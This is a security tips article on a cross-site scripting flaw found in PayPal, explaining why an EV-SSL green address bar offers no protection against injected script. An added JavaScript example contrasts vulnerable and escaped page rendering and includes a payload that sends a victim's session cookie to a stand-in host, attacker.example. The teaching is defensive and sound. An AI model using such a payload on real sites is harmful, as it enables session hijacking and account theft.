A Finnish researcher has found a serious cross-site scripting (XSS) flaw in PayPal that could be used to steal a user’s login info or cookies. Script code is used by sites that allow users to enter data. If that user-supplied data (text, script code, or links) is not properly validated and escaped before the site echoes it back in a page, an attacker’s script runs in your browser as if it came from the site itself: you could be redirected to another, perhaps malicious, Web site, your password or session cookies could be sent to the attacker, or the attacker’s code could act on the site in your name.

The researcher, Harry Sintonen, apparently demonstrated just such an XSS attack a few days ago. Users logged in on a Web page, but their credentials were sent to, shall we say, an unauthorized server.

Even more worrisome, the attack succeeded on a page using the new EV-SSL or Extended Validation SSL certificate. This type of security certificate does more extensive checks on the identity of the organization operating the site than the older, regular SSL certificate. Internet Explorer 7 and the soon-to-be-released Firefox 3 have an address bar that turns green when rendering a site using an EV-SSL certificate.

During Sintonen’s demonstration, however, the address bar remained green, and from the browser’s point of view rightly so: the page really was served by PayPal, over PayPal’s own certificate and encrypted connection. It was the content of that page that had been tampered with. An EV certificate vouches for who runs a site, not for whether the site’s own code is free of flaws, so it cannot stop a script injected through XSS, which runs under the genuine origin and arrives over the genuine secure connection. Recently, PayPal said that EV-SSL was essential to combat fraud, and threatened to ban browsers that don’t support it. It seems that more work needs to be done on the whole concept of certificates. EV-SSL looked like a good idea, but it cannot guarantee that a page is free of security threats.
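To make the point in the two paragraphs above concrete (how unescaped user input becomes an XSS hole, and why the EV indicator stays green while it is exploited), here is an added example. It is not code from the original post and has nothing to do with PayPal’s actual pages: the page template, the search parameter, the attacker’s host and the payload are all constructed for illustration.

```javascript
// Added example, not from the original post. The page template, the "term"
// parameter, the attacker host and the payload are all hypothetical.

// Escape the five characters that matter in HTML text and attribute contexts.
// Ampersand goes first so already-escaped output is not double-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// VULNERABLE: the user-supplied search term is pasted straight into the page.
// Anything the attacker puts in the link's query string becomes page content.
function renderSearchVulnerable(term) {
  return `<html><body><h1>Results for ${term}</h1></body></html>`;
}

// HARDENED: the same page with the term HTML-escaped before insertion.
// The browser now shows the payload as text instead of executing it.
function renderSearchHardened(term) {
  return `<html><body><h1>Results for ${escapeHtml(term)}</h1></body></html>`;
}

// Constructed attacker payload. If it lands in the page unescaped it runs in
// the victim's browser under the legitimate site's origin, over the site's own
// TLS connection, and ships the session cookie to a host the attacker controls.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'" +
  "+encodeURIComponent(document.cookie)</script>";

// Crude check a tester can run on a rendered page: does an executable
// <script> tag come back, or only escaped text?
function reflectsScript(html) {
  return /<script\b/i.test(html);
}

// Render the same attacker input through both templates and report whether
// each one reflects the script intact.
function demo() {
  const bad = renderSearchVulnerable(PAYLOAD);
  const good = renderSearchHardened(PAYLOAD);
  return { vulnerable: reflectsScript(bad), hardened: reflectsScript(good) };
}

console.log(demo()); // { vulnerable: true, hardened: false }
```

Nothing in the vulnerable path touches the certificate: the HTML carrying the payload is generated by the genuine server and delivered over its genuine EV-protected connection, so the green bar is as green as on a clean page. The fix is output escaping on the server (and, for the cookie theft shown here, marking the session cookie HttpOnly so page script cannot read it), not a stronger certificate.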

PayPal is aware of this XSS flaw and is working quickly to fix it, if it hasn’t done so already. No phishing attacks have occurred yet using the flaw, the company said. Even so, be on guard against emails purporting to be from PayPal or its parent, eBay. Never click on links in these emails, since an XSS link points at the real site and will show the real site’s green bar. To go to one of these companies’ Web sites, type the address manually into your browser address bar.

Syd Tash is a noted computer security consultant and author of How to Protect Your Computer Online. He has been keeping Internet surfers safe and secure since the last century. Find out how he does it; protect your own computer with five layers of protection right here:
= > http://MyPCSecuritySite.com

You may include these Tips in your Web sites and publications provided they remain unchanged and include the above paragraph, with the author’s name and Web site.
